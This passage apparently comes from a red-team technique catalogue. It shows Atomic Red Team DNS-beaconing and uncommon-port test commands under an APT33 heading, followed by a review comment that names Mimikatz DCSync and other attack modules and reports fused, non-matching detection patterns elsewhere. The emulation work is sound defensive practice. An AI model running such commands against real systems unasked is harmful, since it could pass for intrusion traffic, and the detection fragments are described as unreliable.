    .\T1071\src\T1071-dns-domain-length.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType TXT
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}
    ```

    # Actor: APT33
    ## Technique Name: Uncommonly Used Port
    ## Technique Commands

    ```
    test-netconnection -ComputerName google.com -port #{port}
    test-netconnection -ComputerName google.com -port 8081
    telnet google.com #{port}
    telnet google.com 8081
    ```
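Review bot: each "Technique Commands" block mixes three kinds of line under one heading with nothing to tell them apart: commands still carrying unresolved Atomic Red Team placeholders (`#{input_file_passwords}`, `#{remote_host}`, `#{domain}`), Empire and Metasploit module paths that are every one listed twice (for example `powershell/recon/http_login` and `powershell/credentials/mimikatz/dcsync`), and detection-rule fragments that are not commands at all (`!=powershell.exe` under Commonly Used Port is a parent-process condition, `[a-z0-9]{1}.exe` is a regex). Several of those fragments were concatenated without a separator when they were extracted, so they match nothing as written: `\\Windows\\.+\\lsass.exeHKLM\SAM|HKLM\Security` in Credential Dumping and `/Create\\Windows\\.+\\schtasks.exe` in Scheduled Task are each two patterns run together, and the Registry Run Keys block has the same problem with the Startup-folder path fused onto the end of the key list. Suggest deduplicating the module lines, splitting the fused patterns on the pattern boundary, and tagging each line with its source (atomic, empire, sigma) or moving the patterns into their own block. Smaller fixes in the same hunk: `schtask.exe` (twice, in Scheduled Task) should be `schtasks.exe`; `New-LocalUser ... -Password ATOM1CR3DT3@M` fails because `-Password` takes a SecureString, not a plain string; and the hydra / auth.log / audit.log excerpt under Brute Force is a machine translation with spaces inserted into paths and addresses (`/ usr / sbin / sshd`, `192.168 .159.129`), so those lines will not grep against real logs.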